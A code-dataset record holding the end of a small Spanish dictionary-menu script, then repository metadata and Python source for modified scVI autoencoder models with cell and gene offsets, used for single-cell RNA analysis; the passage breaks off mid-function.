        # Add it to the dictionary
        d[termino] = definicion
    # Look up a term
    elif( op == 2):
        # Ask for the term
        print("Nombre del termino:")
        termino = input()
        # Print the definition; .get avoids a KeyError on unknown terms
        print(d.get(termino, "ERROR: Término no encontrado"))
    else:
        print("ERROR: Opción no reconocida")
    # The action has been executed;
    # show the menu again
    op = menu()
# On exit, print the whole dictionary
print(d)
|
[
"hogo.jp@gmail.com"
] |
hogo.jp@gmail.com
|
0d35174dbee1362ac380bf5e44b079d867cc538d
|
33ccdaa6293162511c4ad74284f69b2bd6451044
|
/pyscutils/scvi_utils.py
|
047d3b60725774029d64a5f1cef0c6622d33e66e
|
[
"BSD-3-Clause"
] |
permissive
|
saketkc/pyscutils
|
f3f9199f0c2e3954dc79369b99f4612acd9cf0c2
|
282a6cc707deaee80ab8ebc5596d25b9e21d6ffb
|
refs/heads/master
| 2023-01-23T02:26:28.599751
| 2020-11-19T00:31:07
| 2020-11-19T00:31:07
| 297,775,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 50,655
|
py
|
import os
import warnings
warnings.simplefilter("ignore")
import shutil
from typing import Dict, Iterable, List, Tuple
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import proplot
import scanpy as sc
import scvi
import seaborn as sns
import torch
import torch.nn as nn
import torch.nn.functional as F  # F.linear is used in the dispersion branches below
from adjustText import adjust_text
from scvi import set_seed
from scvi.dataset import AnnDatasetFromAnnData
from scvi.models.utils import one_hot
from scvi.inference import UnsupervisedTrainer, load_posterior
from scvi.models.distributions import (
NegativeBinomial,
Poisson,
ZeroInflatedNegativeBinomial,
)
from scvi.models.log_likelihood import log_nb_positive, log_zinb_positive
from scvi.models.modules import DecoderSCVI, Encoder, FCLayers, LinearDecoderSCVI
from scvi.models.vae import LDVAE, VAE
from torch.distributions import Normal
from torch.distributions import kl_divergence as kl
## Modifications from scVI code marked with '################ ===>'
def compute_scvi_latent(
adata: sc.AnnData,
n_latent: int = 50,
n_encoder: int = 1,
n_epochs: int = 200,
lr: float = 1e-3,
use_batches: bool = False,
use_cuda: bool = False,
linear: bool = False,
cell_offset: str = "none",
gene_offset: str = "none",
ldvae_bias: bool = False,
reconstruction_loss: str = "zinb",
hvg_genes=None,
) -> Tuple[scvi.inference.Posterior, np.ndarray]:
"""Train and return a scVI model and sample a latent space
:param adata: sc.AnnData object non-normalized
:param n_latent: dimension of the latent space
:param n_epochs: number of training epochs
:param lr: learning rate
:param use_batches
:param use_cuda
:return: (scvi.Posterior, latent_space)
"""
# Convert easily to scvi dataset
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
# print(scviDataset.X.shape)
# print(scviDataset.X[:10,:5])
# print(scviDataset.raw.X.shape)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
    # Per-gene / per-cell means of the raw counts; X is cells x genes, so dim=0
    # averages over cells (per gene) and dim=1 over genes (per cell). Use the
    # GPU only when requested so CPU-only runs do not crash.
    device = torch.cuda.current_device() if use_cuda else "cpu"
    gene_mean = torch.mean(torch.from_numpy(X).float().to(device), dim=0)
    cell_mean = torch.mean(torch.from_numpy(X).float().to(device), dim=1)
# Train a model
if not linear:
vae = VAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
)
else:
vae = LDVAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
bias=ldvae_bias,
reconstruction_loss=reconstruction_loss,
)
trainer = UnsupervisedTrainer(vae, scviDataset, train_size=1.0, use_cuda=use_cuda)
trainer.train(n_epochs=n_epochs, lr=lr)
# Extract latent space
posterior = trainer.create_posterior(
trainer.model, scviDataset, indices=np.arange(len(scviDataset))
).sequential()
latent, _, _ = posterior.get_latent()
return posterior, latent, vae, trainer
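# Illustrative call (our addition; `adata` must hold raw, non-normalized counts):
#   posterior, latent, vae, trainer = compute_scvi_latent(
#       adata, n_latent=30, n_epochs=100, use_cuda=torch.cuda.is_available())
#   adata.obsm["X_scvi"] = latent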
# Decoder
class DecoderSCVI(nn.Module):
"""Decodes data from latent space of ``n_input`` dimensions ``n_output``
dimensions using a fully-connected neural network of ``n_hidden`` layers.
Parameters
----------
n_input
The dimensionality of the input (latent space)
n_output
The dimensionality of the output (data space)
n_cat_list
A list containing the number of categories
for each category of interest. Each category will be
included using a one-hot encoding
n_layers
The number of fully-connected hidden layers
n_hidden
The number of nodes per hidden layer
dropout_rate
Dropout rate to apply to each of the hidden layers
Returns
-------
"""
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
n_layers: int = 1,
n_hidden: int = 128,
):
super().__init__()
self.px_decoder = FCLayers(
n_in=n_input,
n_out=n_hidden,
n_cat_list=n_cat_list,
n_layers=n_layers,
n_hidden=n_hidden,
dropout_rate=0,
)
# mean gamma
self.px_scale_decoder = nn.Sequential(
nn.Linear(n_hidden, n_output), nn.Softmax(dim=-1)
)
# dispersion: here we only deal with gene-cell dispersion case
self.px_r_decoder = nn.Linear(n_hidden, n_output)
# dropout
self.px_dropout_decoder = nn.Linear(n_hidden, n_output)
def forward(
self, dispersion: str, z: torch.Tensor, library: torch.Tensor, *cat_list: int
):
"""The forward computation for a single sample.
#. Decodes the data from the latent space using the decoder network
#. Returns parameters for the ZINB distribution of expression
#. If ``dispersion != 'gene-cell'`` then value for that param will be ``None``
Parameters
----------
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
z :
tensor with shape ``(n_input,)``
library
library size
cat_list
list of category membership(s) for this sample
Returns
-------
4-tuple of :py:class:`torch.Tensor`
parameters for the ZINB distribution of expression
"""
# The decoder returns values for the parameters of the ZINB distribution
px = self.px_decoder(z, *cat_list)
px_scale = self.px_scale_decoder(px)
px_dropout = self.px_dropout_decoder(px)
# Clamp to high value: exp(12) ~ 160000 to avoid nans (computational stability)
px_rate = (torch.exp(library)) * px_scale # torch.clamp( , max=12)
px_r = self.px_r_decoder(px) if dispersion == "gene-cell" else None
return px_scale, px_r, px_rate, px_dropout
## Modifications from scVI code marked with '################ ===>'
class DecoderSCVIGeneCell(DecoderSCVI):
"""Decodes data from latent space of ``n_input`` dimensions ``n_output``
dimensions using a fully-connected neural network of ``n_hidden`` layers.
Parameters
----------
n_input
The dimensionality of the input (latent space)
n_output
The dimensionality of the output (data space)
n_cat_list
A list containing the number of categories
for each category of interest. Each category will be
included using a one-hot encoding
n_layers
The number of fully-connected hidden layers
n_hidden
The number of nodes per hidden layer
dropout_rate
Dropout rate to apply to each of the hidden layers
Returns
-------
"""
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
n_layers: int = 1,
n_hidden: int = 128,
):
super().__init__(n_input, n_output, n_cat_list, n_layers, n_hidden)
def forward(
self,
dispersion: str,
z: torch.Tensor,
library: torch.Tensor,
*cat_list: int,
cell_offset: torch.Tensor,
gene_offset: torch.Tensor,
dispersion_clamp: list,
):
"""The forward computation for a single sample.
#. Decodes the data from the latent space using the decoder network
#. Returns parameters for the ZINB distribution of expression
#. If ``dispersion != 'gene-cell'`` then value for that param will be ``None``
Parameters
----------
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
z :
tensor with shape ``(n_input,)``
library
library size
cat_list
list of category membership(s) for this sample
Returns
-------
4-tuple of :py:class:`torch.Tensor`
parameters for the ZINB distribution of expression
"""
# The decoder returns values for the parameters of the ZINB distribution
px = self.px_decoder(z, *cat_list)
px_scale = self.px_scale_decoder(px)
px_dropout = self.px_dropout_decoder(px)
        # Clamp to high value: exp(12) ~ 160000 to avoid nans (computational stability)
        ################ ===>
        cell_offset = torch.reshape(cell_offset, (cell_offset.shape[0], 1))
        px_rate = (
            (torch.exp(library) * (cell_offset)) * px_scale * gene_offset
        )  # torch.clamp( , max=12)
        # px_rate = cell_offset #torch.exp(library) + cell_mean * px_scale # torch.clamp( , max=12)
        # px_rate = torch.exp(library + cell_mean) * px_scale # torch.clamp( , max=12)
px_r = self.px_r_decoder(px) if dispersion == "gene-cell" else None
if dispersion == "gene-cell" and dispersion_clamp:
px_r = torch.clamp(px_r, min=dispersion_clamp[0], max=dispersion_clamp[1])
return px_scale, px_r, px_rate, px_dropout
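# Offset arithmetic (our reading of the forward pass above): with library = log L,
# per-cell offset o_c and per-gene offset o_g, the decoded NB mean is
# L * o_c * px_scale * o_g, so "count"/"mean" offsets rescale the expression
# rate directly rather than entering through the latent space.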
class LinearDecoderSCVIGeneCell(nn.Module):
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
use_batch_norm: bool = True,
bias: bool = False,
):
super(LinearDecoderSCVIGeneCell, self).__init__()
# mean gamma
self.factor_regressor = FCLayers(
n_in=n_input,
n_out=n_output,
n_cat_list=n_cat_list,
n_layers=1,
use_relu=False,
use_batch_norm=use_batch_norm,
bias=bias,
dropout_rate=0,
)
# dropout
self.px_dropout_decoder = FCLayers(
n_in=n_input,
n_out=n_output,
n_cat_list=n_cat_list,
n_layers=1,
use_relu=False,
use_batch_norm=use_batch_norm,
bias=bias,
dropout_rate=0,
)
def forward(
self,
dispersion: str,
z: torch.Tensor,
library: torch.Tensor,
*cat_list: int,
cell_offset: torch.Tensor,
gene_offset: torch.Tensor,
):
# The decoder returns values for the parameters of the ZINB distribution
raw_px_scale = self.factor_regressor(z, *cat_list)
px_scale = torch.softmax(raw_px_scale, dim=-1)
px_dropout = self.px_dropout_decoder(z, *cat_list)
##px_rate = torch.exp(library) * px_scale
################ ===>
cell_offset = torch.reshape(cell_offset, (cell_offset.shape[0], 1))
px_rate = (
(torch.exp(library) * cell_offset) * px_scale * gene_offset
) # torch.clamp( , max=12)
px_r = None
return px_scale, px_r, px_rate, px_dropout
# VAEGeneCell model
class VAEGeneCell(nn.Module):
"""Variational auto-encoder model.
This is an implementation of the scVI model descibed in [Lopez18]_
Parameters
----------
n_input
Number of input genes
n_batch
Number of batches, if 0, no batch correction is performed.
n_labels
Number of labels
n_hidden
Number of nodes per hidden layer
n_latent
Dimensionality of the latent space
n_layers
Number of hidden layers used for encoder and decoder NNs
dropout_rate
Dropout rate for neural networks
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
log_variational
Log(data+1) prior to encoding for numerical stability. Not normalization.
reconstruction_loss
One of
* ``'nb'`` - Negative binomial distribution
* ``'zinb'`` - Zero-inflated negative binomial distribution
* ``'poisson'`` - Poisson distribution
Examples
--------
>>> gene_dataset = CortexDataset()
>>> vae = VAE(gene_dataset.nb_genes, n_batch=gene_dataset.n_batches * False,
... n_labels=gene_dataset.n_labels)
"""
def __init__(
self,
n_input: int,
n_batch: int = 0,
n_labels: int = 0,
n_hidden: int = 128,
n_latent: int = 10,
n_layers: int = 1,
dropout_rate: float = 0.1,
dispersion: str = "gene",
log_variational: bool = True,
reconstruction_loss: str = "zinb",
latent_distribution: str = "normal",
cell_offset: str = "none", ################ ===>
gene_offset: str = "none", ################ ===>
dispersion_clamp: list = [],
beta_disentanglement: float = 1.0,
kl_type: str = "reverse",
):
super().__init__()
self.dispersion = dispersion
self.n_latent = n_latent
self.log_variational = log_variational
self.reconstruction_loss = reconstruction_loss
# Automatically deactivate if useless
self.n_batch = n_batch
self.n_labels = n_labels
self.latent_distribution = latent_distribution
################ ===>
self.cell_offset = cell_offset
self.gene_offset = gene_offset
self.dispersion_clamp = dispersion_clamp
self.beta_disentanglement = beta_disentanglement
self.kl_type = kl_type
if self.dispersion == "gene":
self.px_r = torch.nn.Parameter(torch.randn(n_input))
elif self.dispersion == "gene-batch":
self.px_r = torch.nn.Parameter(torch.randn(n_input, n_batch))
elif self.dispersion == "gene-label":
self.px_r = torch.nn.Parameter(torch.randn(n_input, n_labels))
elif self.dispersion == "gene-cell":
pass
else:
            raise ValueError(
                "dispersion must be one of ['gene', 'gene-batch',"
                " 'gene-label', 'gene-cell'], but input was "
                "{}".format(self.dispersion)
            )
# z encoder goes from the n_input-dimensional data to an n_latent-d
# latent space representation
self.z_encoder = Encoder(
n_input,
n_latent,
n_layers=n_layers,
n_hidden=n_hidden,
dropout_rate=dropout_rate,
distribution=latent_distribution,
)
# l encoder goes from n_input-dimensional data to 1-d library size
self.l_encoder = Encoder(
n_input, 1, n_layers=1, n_hidden=n_hidden, dropout_rate=dropout_rate
)
# decoder goes from n_latent-dimensional space to n_input-d data
################ ===>
self.decoder = DecoderSCVIGeneCell(
n_latent,
n_input,
n_cat_list=[n_batch],
n_layers=n_layers,
n_hidden=n_hidden,
)
def get_latents(self, x, y=None) -> torch.Tensor:
"""Returns the result of ``sample_from_posterior_z`` inside a list
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
Returns
-------
type
one element list of tensor
"""
return [self.sample_from_posterior_z(x, y)]
def sample_from_posterior_z(
self, x, y=None, give_mean=False, n_samples=5000
) -> torch.Tensor:
"""Samples the tensor of latent values from the posterior
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
give_mean
is True when we want the mean of the posterior distribution rather than sampling (Default value = False)
n_samples
how many MC samples to average over for transformed mean (Default value = 5000)
Returns
-------
type
tensor of shape ``(batch_size, n_latent)``
"""
if self.log_variational:
x = torch.log(1 + x)
qz_m, qz_v, z = self.z_encoder(x, y) # y only used in VAEC
if give_mean:
if self.latent_distribution == "ln":
samples = Normal(qz_m, qz_v.sqrt()).sample([n_samples])
z = self.z_encoder.z_transformation(samples)
z = z.mean(dim=0)
else:
z = qz_m
return z
def sample_from_posterior_l(self, x) -> torch.Tensor:
"""Samples the tensor of library sizes from the posterior
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)``
Returns
-------
type
tensor of shape ``(batch_size, 1)``
"""
if self.log_variational:
x = torch.log(1 + x)
ql_m, ql_v, library = self.l_encoder(x)
return library
def get_sample_scale(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None
) -> torch.Tensor:
"""Returns the tensor of predicted frequencies of expression
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
n_samples
number of samples (Default value = 1)
transform_batch
int of batch to transform samples into (Default value = None)
Returns
-------
type
tensor of predicted frequencies of expression with shape ``(batch_size, n_input)``
"""
return self.inference(
x,
batch_index=batch_index,
y=y,
n_samples=n_samples,
transform_batch=transform_batch,
)["px_scale"]
def get_sample_rate(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None
) -> torch.Tensor:
"""Returns the tensor of means of the negative binomial distribution
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
n_samples
number of samples (Default value = 1)
transform_batch
int of batch to transform samples into (Default value = None)
Returns
-------
type
tensor of means of the negative binomial distribution with shape ``(batch_size, n_input)``
"""
return self.inference(
x,
batch_index=batch_index,
y=y,
n_samples=n_samples,
transform_batch=transform_batch,
)["px_rate"]
def get_reconstruction_loss(
self, x, px_rate, px_r, px_dropout, **kwargs
) -> torch.Tensor:
# Reconstruction Loss
px_rate_ = px_rate
if self.reconstruction_loss == "zinb":
reconst_loss = (
-ZeroInflatedNegativeBinomial(
mu=px_rate_, theta=px_r, zi_logits=px_dropout
)
.log_prob(x)
.sum(dim=-1)
)
elif self.reconstruction_loss == "nb":
reconst_loss = (
-NegativeBinomial(mu=px_rate_, theta=px_r).log_prob(x).sum(dim=-1)
)
elif self.reconstruction_loss == "poisson":
reconst_loss = -Poisson(px_rate_).log_prob(x).sum(dim=-1)
return reconst_loss
def inference(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None, **kwargs
) -> Dict[str, torch.Tensor]:
"""Helper function used in forward pass"""
x_ = x
if self.log_variational:
x_ = torch.log(1 + x_)
# Sampling
qz_m, qz_v, z = self.z_encoder(x_, y)
ql_m, ql_v, library = self.l_encoder(x_)
if n_samples > 1:
qz_m = qz_m.unsqueeze(0).expand((n_samples, qz_m.size(0), qz_m.size(1)))
qz_v = qz_v.unsqueeze(0).expand((n_samples, qz_v.size(0), qz_v.size(1)))
# when z is normal, untran_z == z
untran_z = Normal(qz_m, qz_v.sqrt()).sample()
z = self.z_encoder.z_transformation(untran_z)
ql_m = ql_m.unsqueeze(0).expand((n_samples, ql_m.size(0), ql_m.size(1)))
ql_v = ql_v.unsqueeze(0).expand((n_samples, ql_v.size(0), ql_v.size(1)))
library = Normal(ql_m, ql_v.sqrt()).sample()
if transform_batch is not None:
dec_batch_index = transform_batch * torch.ones_like(batch_index)
else:
dec_batch_index = batch_index
        ################ ===>
        # Default offsets are all-ones tensors created on the same device as x,
        # replacing the original try/except around torch.cuda.current_device()
        cell_offset = torch.ones(x.shape[0], device=x.device)
        gene_offset = torch.ones(x.shape[1], device=x.device)
if self.cell_offset == "count":
cell_offset = torch.sum(x, dim=1)
elif self.cell_offset == "mean":
cell_offset = torch.mean(x, dim=1)
if self.gene_offset == "count":
gene_offset = torch.sum(x, dim=0)
elif self.gene_offset == "mean":
gene_offset = torch.mean(x, dim=0)
px_scale, px_r, px_rate, px_dropout = self.decoder(
self.dispersion,
z,
library,
dec_batch_index,
y,
cell_offset=cell_offset, ################ ===>
gene_offset=gene_offset, ################ ===>
dispersion_clamp=self.dispersion_clamp,
)
if self.dispersion == "gene-label":
px_r = F.linear(
one_hot(y, self.n_labels), self.px_r
) # px_r gets transposed - last dimension is nb genes
elif self.dispersion == "gene-batch":
px_r = F.linear(one_hot(dec_batch_index, self.n_batch), self.px_r)
elif self.dispersion == "gene":
px_r = self.px_r
px_r = torch.exp(px_r)
return dict(
px_scale=px_scale,
px_r=px_r,
px_rate=px_rate,
px_dropout=px_dropout,
qz_m=qz_m,
qz_v=qz_v,
z=z,
ql_m=ql_m,
ql_v=ql_v,
library=library,
)
def forward(
self, x, local_l_mean, local_l_var, batch_index=None, y=None
) -> Tuple[torch.Tensor, torch.Tensor]:
"""Returns the reconstruction loss and the KL divergences
Parameters
----------
x
tensor of values with shape (batch_size, n_input)
local_l_mean
tensor of means of the prior distribution of latent variable l
with shape (batch_size, 1)
local_l_var
tensor of variancess of the prior distribution of latent variable l
with shape (batch_size, 1)
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
y
tensor of cell-types labels with shape (batch_size, n_labels) (Default value = None)
Returns
-------
type
the reconstruction loss and the Kullback divergences
"""
# Parameters for z latent distribution
outputs = self.inference(x, batch_index, y)
qz_m = outputs["qz_m"]
qz_v = outputs["qz_v"]
ql_m = outputs["ql_m"]
ql_v = outputs["ql_v"]
px_rate = outputs["px_rate"]
px_r = outputs["px_r"]
px_dropout = outputs["px_dropout"]
# KL Divergence
mean = torch.zeros_like(qz_m)
scale = torch.ones_like(qz_v)
# only use it on mean
if self.kl_type == "reverse":
kl_divergence_z = kl(
Normal(qz_m, torch.sqrt(qz_v)), Normal(mean, scale)
).sum(dim=1)
elif self.kl_type == "forward":
kl_divergence_z = kl(
Normal(mean, scale), Normal(qz_m, torch.sqrt(qz_v))
).sum(dim=1)
elif self.kl_type == "symmetric":
p_sum_q = Normal(mean + qz_m, scale + torch.sqrt(qz_v))
kl_divergence_z_f = kl(Normal(mean, scale), p_sum_q).sum(dim=1)
kl_divergence_z_r = kl(Normal(qz_m, torch.sqrt(qz_v)), p_sum_q).sum(dim=1)
kl_divergence_z = 0.5 * (kl_divergence_z_f + kl_divergence_z_r)
kl_divergence_l = kl(
Normal(ql_m, torch.sqrt(ql_v)),
Normal(local_l_mean, torch.sqrt(local_l_var)),
).sum(dim=1)
kl_divergence = kl_divergence_z * self.beta_disentanglement
reconst_loss = self.get_reconstruction_loss(
x,
px_rate,
px_r,
px_dropout,
)
return reconst_loss + kl_divergence_l, kl_divergence, 0.0
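# KL variants used in forward above (our summary): "reverse" is KL(q(z|x) || p(z))
# as in standard scVI, "forward" is KL(p(z) || q(z|x)), and "symmetric" averages
# both KLs against a Gaussian built from the summed means/scales -- a cheap
# stand-in for the Jensen-Shannon midpoint, not the exact mixture distribution.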
class LDVAEGeneCell(VAEGeneCell):
"""Linear-decoded Variational auto-encoder model.
Implementation of [Svensson20]_.
This model uses a linear decoder, directly mapping the latent representation
to gene expression levels. It still uses a deep neural network to encode
the latent representation.
Compared to standard VAE, this model is less powerful, but can be used to
inspect which genes contribute to variation in the dataset. It may also be used
for all scVI tasks, like differential expression, batch correction, imputation, etc.
However, batch correction may be less powerful as it assumes a linear model.
Parameters
----------
n_input
Number of input genes
n_batch
Number of batches
n_labels
Number of labels
n_hidden
Number of nodes per hidden layer (for encoder)
n_latent
Dimensionality of the latent space
n_layers_encoder
Number of hidden layers used for encoder NNs
dropout_rate
Dropout rate for neural networks
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
log_variational
Log(data+1) prior to encoding for numerical stability. Not normalization.
reconstruction_loss
One of
* ``'nb'`` - Negative binomial distribution
* ``'zinb'`` - Zero-inflated negative binomial distribution
use_batch_norm
Bool whether to use batch norm in decoder
bias
Bool whether to have bias term in linear decoder
"""
def __init__(
self,
n_input: int,
n_batch: int = 0,
n_labels: int = 0,
n_hidden: int = 128,
n_latent: int = 10,
n_layers_encoder: int = 1,
dropout_rate: float = 0.1,
dispersion: str = "gene",
log_variational: bool = True,
reconstruction_loss: str = "nb",
use_batch_norm: bool = True,
bias: bool = False,
latent_distribution: str = "normal",
cell_offset: str = "none",
gene_offset: str = "none",
):
super().__init__(
n_input,
n_batch,
n_labels,
n_hidden,
n_latent,
n_layers_encoder,
dropout_rate,
dispersion,
log_variational,
reconstruction_loss,
latent_distribution,
cell_offset, ################ ===>
gene_offset, ################ ===>
)
self.use_batch_norm = use_batch_norm
self.z_encoder = Encoder(
n_input,
n_latent,
n_layers=n_layers_encoder,
n_hidden=n_hidden,
dropout_rate=dropout_rate,
distribution=latent_distribution,
)
################ ===>
self.decoder = LinearDecoderSCVIGeneCell(
n_latent,
n_input,
n_cat_list=[n_batch],
use_batch_norm=use_batch_norm,
bias=bias,
)
@torch.no_grad()
def get_loadings(self) -> np.ndarray:
"""Extract per-gene weights (for each Z, shape is genes by dim(Z)) in the linear decoder."""
# This is BW, where B is diag(b) batch norm, W is weight matrix
if self.use_batch_norm is True:
w = self.decoder.factor_regressor.fc_layers[0][0].weight
bn = self.decoder.factor_regressor.fc_layers[0][1]
sigma = torch.sqrt(bn.running_var + bn.eps)
gamma = bn.weight
b = gamma / sigma
bI = torch.diag(b)
loadings = torch.matmul(bI, w)
else:
loadings = self.decoder.factor_regressor.fc_layers[0][0].weight
loadings = loadings.detach().cpu().numpy()
if self.n_batch > 1:
loadings = loadings[:, : -self.n_batch]
return loadings
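# Loadings math (as implemented above): batch norm rescales each output by
# gamma / sqrt(running_var + eps), so the effective linear map is
# diag(gamma / sigma) @ W; the additive shift terms drop out of the loadings.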
def compute_scvi_latent(
adata: sc.AnnData,
n_latent: int = 50,
n_encoder: int = 1,
n_epochs: int = 200,
lr: float = 1e-3,
use_batches: bool = False,
use_cuda: bool = False,
linear: bool = False,
cell_offset: str = "none",
gene_offset: str = "none",
ldvae_bias: bool = False,
reconstruction_loss: str = "zinb",
dispersion: str = "gene",
hvg_genes="all",
point_size=10,
dispersion_clamp=[],
beta_disentanglement=1.0,
kl_type="reverse",
) -> Tuple[scvi.inference.Posterior, np.ndarray]:
"""Train and return a scVI model and sample a latent space
:param adata: sc.AnnData object non-normalized
:param n_latent: dimension of the latent space
:param n_epochs: number of training epochs
:param lr: learning rate
:param use_batches
:param use_cuda
:return: (scvi.Posterior, latent_space)
"""
# Convert easily to scvi dataset
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
# Train a model
if not linear:
vae = VAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
dispersion_clamp=dispersion_clamp,
beta_disentanglement=beta_disentanglement,
kl_type=kl_type,
)
else:
vae = LDVAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
bias=ldvae_bias,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
)
trainer = UnsupervisedTrainer(vae, scviDataset, train_size=1.0, use_cuda=use_cuda)
trainer.train(n_epochs=n_epochs, lr=lr)
# Extract latent space
posterior = trainer.create_posterior(
trainer.model, scviDataset, indices=np.arange(len(scviDataset))
).sequential()
latent, _, _ = posterior.get_latent()
return posterior, latent, vae, trainer
def RunVAE(
adata,
reconstruction_loss,
n_latent=30,
n_encoder=1,
linear=False,
cell_offset="none",
gene_offset="none",
ldvae=False,
ldvae_bias=False,
title_prefix="",
dispersion="gene",
hvg_genes="all",
point_size=5,
n_epochs=200,
lr=1e-3,
batch_size=1000,
use_cuda=False,
legend_loc="on data",
figsize=(10, 5),
legend_fontweight="normal",
sct_cell_pars=None,
outdir=None,
sct_gene_pars=None,
sct_model_pars_fit=None,
dispersion_clamp=[],
beta_disentanglement=1.0,
kl_type="reverse",
):
sct_gene_pars_df = pd.read_csv(sct_gene_pars, sep="\t", index_col=0)
sct_model_pars_fit_df = pd.read_csv(sct_model_pars_fit, sep="\t", index_col=0)
sct_model_paras_withgmean = sct_model_pars_fit_df.join(sct_gene_pars_df)
scvi_posterior, scvi_latent, scvi_vae, scvi_trainer = compute_scvi_latent(
adata,
n_encoder=n_encoder,
n_epochs=n_epochs,
n_latent=n_latent,
use_cuda=use_cuda,
linear=linear,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
hvg_genes=hvg_genes,
dispersion_clamp=dispersion_clamp,
beta_disentanglement=beta_disentanglement,
kl_type=kl_type,
)
suffix = "_{}_{}_{}_{}".format(
cell_offset, gene_offset, reconstruction_loss, dispersion
)
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
# posterior freq of genes per cell
# scale = scvi_posterior.sequential(batch_size=batch_size).get_sample_scale()
# scale = scale.detach()
scale = scvi_posterior.get_sample_scale()
# batch_size=batch_size
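    # Monte Carlo estimate: average the posterior scale over 100 samples
    # (the first draw above plus the 99 below) to smooth sampling noise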
for _ in range(99):
scale += scvi_posterior.get_sample_scale()
scale /= 100
scale_df = pd.DataFrame(scale)
scale_df.index = list(adata.obs_names)
scale_df.columns = list(scviDataset.gene_ids)
scale_df = scale_df.T
scvi_latent_df = pd.DataFrame(scvi_latent)
scvi_latent_df.index = list(adata.obs_names)
if outdir:
os.makedirs(outdir, exist_ok=True)
scale_df.to_csv(
os.path.join(outdir, "SCVI_scale_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
scvi_latent_df.to_csv(
os.path.join(outdir, "SCVI_latent_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
adata.obsm["X_scvi"] = scvi_latent
for gene, gene_scale in zip(adata.var.index, np.squeeze(scale).T):
adata.obs["scale_" + gene] = gene_scale
sc.pp.neighbors(adata, use_rep="X_scvi", n_neighbors=20, n_pcs=30)
sc.tl.umap(adata, min_dist=0.3)
sc.tl.leiden(adata, key_added="X_scvi", resolution=0.8)
X_umap = adata.obsm["X_umap"]
X_umap_df = pd.DataFrame(X_umap)
X_umap_df.index = list(adata.obs_names)
if outdir:
X_umap_df.to_csv(
os.path.join(outdir, "SCVI_Xumap_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
try:
X = torch.from_numpy(X).float().to(torch.cuda.current_device())
batch = torch.from_numpy(scviDataset.batch_indices.astype(float)).to(
torch.cuda.current_device()
)
    except Exception:  # fall back to CPU when CUDA is unavailable
X = torch.from_numpy(X).float()
batch = torch.from_numpy(scviDataset.batch_indices.astype(float))
inference = scvi_vae.inference(X, batch)
# torch.cuda.empty_cache()
if reconstruction_loss == "nb":
reconst_loss = log_nb_positive(
X,
inference["px_rate"],
inference["px_r"],
inference["px_dropout"],
